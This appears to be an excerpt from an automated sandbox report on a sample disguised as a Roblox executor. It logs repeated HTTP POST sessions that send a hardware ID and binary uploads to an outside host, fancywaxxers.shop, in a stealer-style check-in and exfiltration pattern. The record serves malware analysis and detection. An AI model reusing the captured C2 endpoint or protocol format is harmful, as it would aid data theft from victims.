                                                                                        Data Ascii: --2EKJAD3T7WDXLContent-Disposition: form-data; name="hwid"C0AC7329087A92D2EE9065F2D612EB0C--2EKJAD3T7WDXLContent-Disposition: form-data; name="pid"2--2EKJAD3T7WDXLContent-Disposition: form-data; name="lid"yau6Na--899083440--2EKJAD3
                                                                                        2024-12-31 16:23:10 UTC1138INHTTP/1.1 200 OK
                                                                                        Date: Tue, 31 Dec 2024 16:23:10 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=b04jk6csrvo4v5n1s09fq179v4; expires=Sat, 26 Apr 2025 10:09:48 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e4fObAdqMBFeQCEXu16kFfUlEfjjF7GvIQkqNQY%2BY%2B%2B6bmBzPAw%2FMITfO8IZSKlrIRENezfbPPDf5V%2FHlL3Ef1%2FyW4vFEVl6lqWNNQ94wVv3AriCRRmdkwJhrliUsjxOygzhvA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fab9ccdb81cc32e-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1640&min_rtt=1607&rtt_var=626&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2843&recv_bytes=13745&delivery_rate=1817050&cwnd=178&unsent_bytes=0&cid=f3f61ae95ac9fded&ts=509&x=0"
                                                                                        2024-12-31 16:23:10 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                        Data Ascii: fok 8.46.123.189
                                                                                        2024-12-31 16:23:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.549707104.21.96.14432828C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-31 16:23:10 UTC284OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=DAKKXE4EIJND8HPYCXY
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 15087
                                                                                        Host: fancywaxxers.shop
                                                                                        2024-12-31 16:23:10 UTC15087OUTData Raw: 2d 2d 44 41 4b 4b 58 45 34 45 49 4a 4e 44 38 48 50 59 43 58 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 30 41 43 37 33 32 39 30 38 37 41 39 32 44 32 45 45 39 30 36 35 46 32 44 36 31 32 45 42 30 43 0d 0a 2d 2d 44 41 4b 4b 58 45 34 45 49 4a 4e 44 38 48 50 59 43 58 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 44 41 4b 4b 58 45 34 45 49 4a 4e 44 38 48 50 59 43 58 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 39
                                                                                        Data Ascii: --DAKKXE4EIJND8HPYCXYContent-Disposition: form-data; name="hwid"C0AC7329087A92D2EE9065F2D612EB0C--DAKKXE4EIJND8HPYCXYContent-Disposition: form-data; name="pid"2--DAKKXE4EIJND8HPYCXYContent-Disposition: form-data; name="lid"yau6Na--89
                                                                                        2024-12-31 16:23:11 UTC1137INHTTP/1.1 200 OK
                                                                                        Date: Tue, 31 Dec 2024 16:23:11 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=p39u4d34idkhtip6vop6iimcmb; expires=Sat, 26 Apr 2025 10:09:50 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3q6R6I6WQ2wdyXrKK0vXO7qBHSwcgxPbQm%2BaAXAWUvLSoIaU1s5%2Ba8NLW4tok0Uh2Q28E8O8QtIBXbBI9jSN4%2FwUT%2FeOPdX%2FxXt2jMOmVTlofYG3vwG4cd5lT5HmEErQrZI3YQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fab9cd4e96f42c0-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1706&min_rtt=1700&rtt_var=650&sent=12&recv=19&lost=0&retrans=0&sent_bytes=2843&recv_bytes=16029&delivery_rate=1665715&cwnd=212&unsent_bytes=0&cid=f8900222d71f680a&ts=900&x=0"
                                                                                        2024-12-31 16:23:11 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                        Data Ascii: fok 8.46.123.189
                                                                                        2024-12-31 16:23:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.549708104.21.96.14432828C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-31 16:23:12 UTC283OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=DVE80MC68OH49RH1N7
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 20571
                                                                                        Host: fancywaxxers.shop
                                                                                        2024-12-31 16:23:12 UTC15331OUTData Raw: 2d 2d 44 56 45 38 30 4d 43 36 38 4f 48 34 39 52 48 31 4e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 30 41 43 37 33 32 39 30 38 37 41 39 32 44 32 45 45 39 30 36 35 46 32 44 36 31 32 45 42 30 43 0d 0a 2d 2d 44 56 45 38 30 4d 43 36 38 4f 48 34 39 52 48 31 4e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 44 56 45 38 30 4d 43 36 38 4f 48 34 39 52 48 31 4e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 39 39 30 38
                                                                                        Data Ascii: --DVE80MC68OH49RH1N7Content-Disposition: form-data; name="hwid"C0AC7329087A92D2EE9065F2D612EB0C--DVE80MC68OH49RH1N7Content-Disposition: form-data; name="pid"3--DVE80MC68OH49RH1N7Content-Disposition: form-data; name="lid"yau6Na--89908
                                                                                        2024-12-31 16:23:12 UTC5240OUTData Raw: 3e 93 af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                        Data Ascii: >56vMMZh'F3Wun 4F([:7s~X`nO
                                                                                        2024-12-31 16:23:12 UTC1137INHTTP/1.1 200 OK
                                                                                        Date: Tue, 31 Dec 2024 16:23:12 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=0hnefop3qvjc6ih4aprrti0n3m; expires=Sat, 26 Apr 2025 10:09:51 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Gr3zqAL%2FRBxCgCtXzb8Jrm2HwFemdcQqoIF0t1u4JZRCigBMJTj0dKSwXl27SeBYsbLuG%2B4k%2FUiBVUdYRFYx%2FQZ5p6H0hhqqZu1G4szGenzM2jEp61y2y%2BducUPW8KK7bPAcg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fab9cde1add72a4-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1915&min_rtt=1908&rtt_var=730&sent=12&recv=26&lost=0&retrans=0&sent_bytes=2843&recv_bytes=21534&delivery_rate=1485249&cwnd=212&unsent_bytes=0&cid=0b8c452a4318e2dd&ts=619&x=0"
                                                                                        2024-12-31 16:23:12 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                        Data Ascii: fok 8.46.123.189
                                                                                        2024-12-31 16:23:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.2.549709104.21.96.14432828C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-31 16:23:13 UTC278OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=OXAT6TVT3CL1XK
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 1236
                                                                                        Host: fancywaxxers.shop
                                                                                        2024-12-31 16:23:13 UTC1236OUTData Raw: 2d 2d 4f 58 41 54 36 54 56 54 33 43 4c 31 58 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 30 41 43 37 33 32 39 30 38 37 41 39 32 44 32 45 45 39 30 36 35 46 32 44 36 31 32 45 42 30 43 0d 0a 2d 2d 4f 58 41 54 36 54 56 54 33 43 4c 31 58 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4f 58 41 54 36 54 56 54 33 43 4c 31 58 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 0d 0a 2d 2d 4f 58 41 54
                                                                                        Data Ascii: --OXAT6TVT3CL1XKContent-Disposition: form-data; name="hwid"C0AC7329087A92D2EE9065F2D612EB0C--OXAT6TVT3CL1XKContent-Disposition: form-data; name="pid"1--OXAT6TVT3CL1XKContent-Disposition: form-data; name="lid"yau6Na--899083440--OXAT
                                                                                        2024-12-31 16:23:14 UTC1134INHTTP/1.1 200 OK
                                                                                        Date: Tue, 31 Dec 2024 16:23:14 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=5rdfnvr8tp7vre3bobu5pssfng; expires=Sat, 26 Apr 2025 10:09:53 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f%2BJR%2BBTSHgyN02EWfWbB%2F%2BH9vC5erMT2Bxr8TGcnGE%2BTGPpFlR0djLFlNuPo5GUepwWwXFpclFTTgScxaPaKwsUPC2lkcZacFfgH2Oum4qx3AoP8dskkN22gL7l4bzyw3kMcwA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fab9ce8ae26c32e-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1676&min_rtt=1662&rtt_var=652&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2842&recv_bytes=2150&delivery_rate=1641371&cwnd=178&unsent_bytes=0&cid=6b66b407c573c206&ts=575&x=0"
                                                                                        2024-12-31 16:23:14 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                        Data Ascii: fok 8.46.123.189
                                                                                        2024-12-31 16:23:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.549710104.21.96.14432828C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-31 16:23:15 UTC280OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=G9COZEGBVXJQXX
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 567879
                                                                                        Host: fancywaxxers.shop
                                                                                        2024-12-31 16:23:15 UTC15331OUTData Raw: 2d 2d 47 39 43 4f 5a 45 47 42 56 58 4a 51 58 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 30 41 43 37 33 32 39 30 38 37 41 39 32 44 32 45 45 39 30 36 35 46 32 44 36 31 32 45 42 30 43 0d 0a 2d 2d 47 39 43 4f 5a 45 47 42 56 58 4a 51 58 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 47 39 43 4f 5a 45 47 42 56 58 4a 51 58 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 0d 0a 2d 2d 47 39 43 4f
                                                                                        Data Ascii: --G9COZEGBVXJQXXContent-Disposition: form-data; name="hwid"C0AC7329087A92D2EE9065F2D612EB0C--G9COZEGBVXJQXXContent-Disposition: form-data; name="pid"1--G9COZEGBVXJQXXContent-Disposition: form-data; name="lid"yau6Na--899083440--G9CO
                                                                                        2024-12-31 16:23:15 UTC15331OUTData Raw: ea 91 ec 8e db 72 92 30 1f ef cf ce 97 43 ad 2a ae 1f 35 fe 93 2b d1 68 5a e0 86 6d a0 d7 3b 69 90 34 9f dc 48 94 a1 26 49 fd ae 15 64 d1 20 cc b3 b5 dc 68 e8 6d 9f fa 98 80 cb b9 55 c8 3b ad 01 5e 1a 11 d6 e5 08 dd d3 7d 4c 71 5a 30 4b 75 c3 4c 69 f7 c2 93 b8 ce 92 1c 2c ac b7 64 91 5b b4 33 e1 e5 76 3a 6f 72 86 52 25 3b 5d a2 b8 7a 8f 15 9e 35 c7 0a 54 09 d9 35 53 be 1d a6 c2 c6 fc 40 6d c2 b1 d3 6a 1c 9a 3a c1 bc 85 5b 14 03 df 8a f0 2c f6 1d 21 ff 83 b1 6b b7 f4 11 1d d6 10 1e 92 a8 9e b8 d5 18 d0 8e db 7c 47 9c 7b 1f a7 89 8f 46 6d 15 0a 26 9c 62 62 c8 ce 1f 9e 25 5a 1c d7 bd b2 04 39 b6 5b d4 a4 06 d7 2c db f2 a3 38 19 a3 a4 bc d8 f9 3b 23 0a cd 77 59 66 13 8d 9b ba 16 ef d7 d4 33 aa 43 fd 92 20 73 3c 59 3e 38 14 9e 42 1d fd a7 29 8d a7 8a a2 96 80
                                                                                        Data Ascii: r0C*5+hZm;i4H&Id hmU;^}LqZ0KuLi,d[3v:orR%;]z5T5S@mj:[,!k|G{Fm&bb%Z9[,8;#wYf3C s<Y>8B)
                                                                                        2024-12-31 16:23:15 UTC15331OUTData Raw: b5 82 1d 98 17 ce 96 cd 14 22 55 23 92 7b 6b 5a dd 89 93 cf 3a d2 6c 2c b5 70 7e 5c f1 b8 21 81 b0 fb 4e 35 39 96 b4 94 dc 1f e9 7d ff 07 23 4a 96 3f 21 12 32 50 43 29 e5 29 b7 3b fe d7 6d 72 34 cc 33 df 2f 34 dc c7 0e 4a 47 19 05 aa 07 9b 35 04 15 11 30 6c b1 ae c7 5f 56 94 13 22 6b 8c 10 5e e5 44 b8 55 6f 95 fe 3c 9a f3 a4 54 18 da 24 f0 76 b9 da 25 f2 11 86 15 6c 18 a1 01 51 eb 6f 9a ef 88 06 16 ab ae 36 07 d0 d1 bb 86 ca 54 e4 8a b6 e2 77 2a 86 c2 5e 63 8a 03 c1 d6 6f 03 a7 15 ac d6 5f 31 2c 7e 6d c4 da ec 46 ed 50 3d bb bd 91 e7 3f ea ec 9a 9b 18 5f 1a 79 67 fd 71 f9 fa 58 e2 c0 c9 43 03 3f 03 d7 df 32 3c d9 5f 9e fd 96 50 b7 1d 3c 00 2a 16 56 ed 4b 54 ae db 8c b6 a6 06 3e d4 ff f5 df 59 d4 da e6 a0 b4 64 d9 1d bb 9f ff cc 6b 2b fc 6d cb 76 3b dd 1d
                                                                                        Data Ascii: "U#{kZ:l,p~\!N59}#J?!2PC));mr43/4JG50l_V"k^DUo<T$v%lQo6Tw*^co_1,~mFP=?_ygqXC?2<_P<*VKT>Ydk+mv;
                                                                                        2024-12-31 16:23:15 UTC15331OUTData Raw: 4f d9 2f 8e 5d e8 95 8a 7e da d8 7d 1c ac f0 4d 94 b5 37 11 24 1e 01 d3 5a 18 69 15 90 32 35 b0 4a a2 ea ef 1c b4 59 24 8c 49 df b8 d1 41 d3 c2 24 ba 81 5e 02 11 03 2e 1f 57 fb 7e 08 93 af 75 5a 83 68 01 74 ce e2 7b 0f 00 e5 48 f8 75 03 c3 52 3e b3 92 7b 46 99 61 f6 81 84 88 16 6d 37 28 41 0b e4 bb 73 54 20 38 9e 40 b9 c4 3c 05 51 15 2e ac 67 23 33 66 f9 13 c1 44 19 74 f9 63 43 d5 e7 dd e4 a9 10 db d9 9b 47 90 ca c3 29 21 46 f9 b2 c1 16 f2 cf b7 26 a6 22 af 07 8a ad 0c 4a f8 eb cf 50 cb 9d 08 90 ca fc 3d 88 02 0c 19 75 77 b6 c8 a9 fa a8 37 05 7b 49 dd 7b 2d d4 72 34 b6 a7 e3 c8 f1 ac dc 2d 81 b7 5e c6 ad 5b f7 b8 0f 51 80 b1 28 dd 2a 0e d3 1f 04 fb 41 4d 03 61 84 45 c0 56 5b 13 18 53 e6 1d be af 01 b8 39 67 45 51 96 3f 7c 83 68 bf 04 bb 1f e8 b2 3f 91 48
                                                                                        Data Ascii: O/]~}M7$Zi25JY$IA$^.W~uZht{HuR>{Fam7(AsT 8@<Q.g#3fDtcCG)!F&"JP=uw7{I{-r4-^[Q(*AMaEV[S9gEQ?|h?H
                                                                                        2024-12-31 16:23:15 UTC15331OUTData Raw: 4d 27 6c 48 d4 2d 02 a4 2b 67 25 9f e1 cf 9e 58 73 ad 8f 16 37 d5 48 eb 69 16 22 36 05 98 7a 56 65 ed 16 88 f6 9e 6c ea 34 73 e4 d9 34 a1 b4 eb ad 2b 83 56 e1 90 f7 63 e3 98 12 52 52 a6 ba 00 10 62 5d 10 23 b9 6d 0f 1b 16 bc 59 b1 71 08 8f da 19 87 bb 40 ee 3b 20 0e e1 23 7a 1a c8 c1 53 6b 3d 12 11 9e f1 ef 5f e9 17 35 85 1e 10 ce 1a e7 4f f5 d1 2f 88 f9 b6 11 8e fb 76 f8 7e e8 cc 07 35 51 de 43 e2 ff ef b4 6b b0 09 a8 a1 18 10 a3 87 4a 85 c2 33 8e 83 cc 88 fa 8f 00 ae bf 00 ab b3 a4 ea 7e 4f 9c 3f 10 cb 30 32 72 29 9c 0a 82 e3 36 1d 53 a3 c3 47 32 36 5f 58 3f e2 e9 30 a3 7f 5f 11 43 c1 dd c3 d9 20 c9 8b ac 87 5a a9 36 83 4d d5 88 ee a9 6b b8 fd 99 01 d8 f4 77 46 7d 62 e5 62 a8 90 20 2c 09 be 59 ea db e3 ea ca 39 00 4a 3a 12 19 ed 4d b7 b7 ab 9a 36 cc 83
                                                                                        Data Ascii: M'lH-+g%Xs7Hi"6zVel4s4+VcRRb]#mYq@; #zSk=_5O/v~5QCkJ3~O?02r)6SG26_X?0_C Z6MkwF}bb ,Y9J:M6
                                                                                        2024-12-31 16:23:15 UTC15331OUTData Raw: 69 1a 08 0b 55 21 81 05 fb cc ee 7e ed 96 c1 df 9d 19 1b e6 da 65 fb 3b 4d 6a f5 fb f3 c3 76 dc a1 1d ac 7f 5e ca 14 09 54 20 d1 7c 0f 07 38 b1 d5 bf b1 4c 5f 6a 33 57 73 94 cf 6e 8a 14 a1 1a 89 87 a8 c2 af 88 bd 7c b9 79 86 b5 a4 5a fd 8b f8 17 b3 d5 15 41 9a c6 2f e2 b1 69 0a 77 e0 0c 19 98 8f 33 9f fc 0d 38 24 4e 8f 18 55 fd c0 c6 8c f5 4e ec 97 c7 d4 57 36 f8 16 32 84 4e 57 1d 74 d8 64 ec 0b 6c 09 a0 1c 8b 7c 9f 2a 1e 55 5f 8d 96 8d 22 15 7c 71 b4 db 53 2b fd de ec 5e f0 93 41 54 d3 f3 f5 9a 95 b6 5c 61 cf f9 3c 43 d8 70 cf ef d9 c2 da d4 27 d4 ee 0f 84 a9 6f 85 22 ce 80 3c bd 4d 1b d1 b7 fd a0 1f ba b6 fa 43 54 61 a8 78 4f 7d e5 26 67 f3 50 21 d6 54 88 2c 2c e8 7b cf 74 3e 0c 26 9b 85 9d 97 1d f9 7e 18 23 27 45 fc 55 5c 88 3a 72 21 b7 80 90 5e b0 fa
                                                                                        Data Ascii: iU!~e;Mjv^T |8L_j3Wsn|yZA/iw38$NUNW62NWtdl|*U_"|qS+^AT\a<Cp'o"<MCTaxO}&gP!T,,{t>&~#'EU\:r!^
                                                                                        2024-12-31 16:23:15 UTC15331OUTData Raw: 51 b9 79 95 c8 77 2c e0 75 94 ca 7f 02 35 bd a7 0f 3a 94 07 97 5b 6f 3d 51 b0 98 d5 8d f2 8b 7b 1e a8 73 c4 fa c8 25 f7 ae 1f 25 67 ff a0 6a 9e 07 ec d8 38 13 3f 29 26 ed c1 a6 3c c7 85 9f cf 0f 7e 3b c0 2a b3 d1 ed e8 eb 7c 78 7d 30 a4 6e bc 38 b5 63 3f 39 d7 99 7b dd f2 ba 43 d7 d9 7c cd 82 b4 36 66 ef cf fc 73 1d 9d b1 b2 83 7b 2f 2c f5 2d ac bc 55 77 cc a1 fe d9 1f 76 5e cb 1c 44 3c 3e 07 f1 49 42 b5 15 be df bd 76 7c f0 64 9c 4f 77 de c3 97 9c d5 d0 95 3a 75 62 25 df 68 ff df f4 c1 44 da c0 c3 49 e7 db 35 39 7f 85 2d 74 45 75 35 48 5d 0a 5b 58 2f b9 81 42 85 b4 8e a5 e5 e4 36 8c a5 ae bc a5 ad da 58 b8 2e 18 fe 8c 4d cb 68 b8 d2 12 74 84 24 56 57 f3 95 fa 27 ca ed ed c2 44 56 fb 66 d6 8f ad ac ad c7 53 57 6c 8a 04 6c ce 18 de a1 29 4b d4 98 90 19 09
                                                                                        Data Ascii: Qyw,u5:[o=Q{s%%gj8?)&<~;*|x}0n8c?9{C|6fs{/,-Uwv^D<>IBv|dOw:ub%hDI59-tEu5H][X/B6X.Mht$VW'DVfSWll)K
                                                                                        2024-12-31 16:23:15 UTC15331OUTData Raw: f7 51 f0 72 3e 95 4a 9a 0c c0 3f 91 87 db e7 3c 45 9b 03 cf 0c af c6 30 8e e1 5b 16 44 0d f8 d7 bf f7 20 77 83 99 05 e5 16 ba 20 26 25 a9 de 60 51 3b 1e d6 c4 78 4e 49 e7 b0 df 31 95 51 e6 58 e6 76 6c 67 b7 b6 1b 0c 47 84 3f d1 6d 37 e2 4b 70 3f ed f4 a6 f3 d5 c0 0e 84 6b 3f 42 db b3 5d 9b b3 db 44 1e 91 a6 bf 9e 15 95 db 88 c3 a3 04 57 f0 c0 cf 1c cf f6 39 e0 3c 54 3e cf 21 8f bc 2f 65 13 20 07 12 fb 6e 34 75 b9 34 60 17 cd e1 5e 42 e5 2f 89 f7 62 33 2f da 2d eb cf 10 64 2e 06 20 93 eb 16 c6 21 51 32 ef 2c 8b 3b 05 dd d8 78 36 92 4c a4 c8 6d 38 96 e4 cd 7b 08 f1 4f 24 d5 ed c7 e7 cf 7b b6 89 ca 2b 81 84 d5 d9 fe 66 dd b4 a6 9e 4b 40 4f c9 4c 27 fd 82 fe eb 7d fa 9a ad af 16 69 ca 95 e8 8f 47 5e 94 e0 80 4c 46 44 9d 14 3e 16 33 57 28 6c 8b 19 0f 3e bc 38
                                                                                        Data Ascii: Qr>J?<E0[D w &%`Q;xNI1QXvlgG?m7Kp?k?B]DW9<T>!/e n4u4`^B/b3/-d. !Q2,;x6Lm8{O${+fK@OL'}iG^LFD>3W(l>8
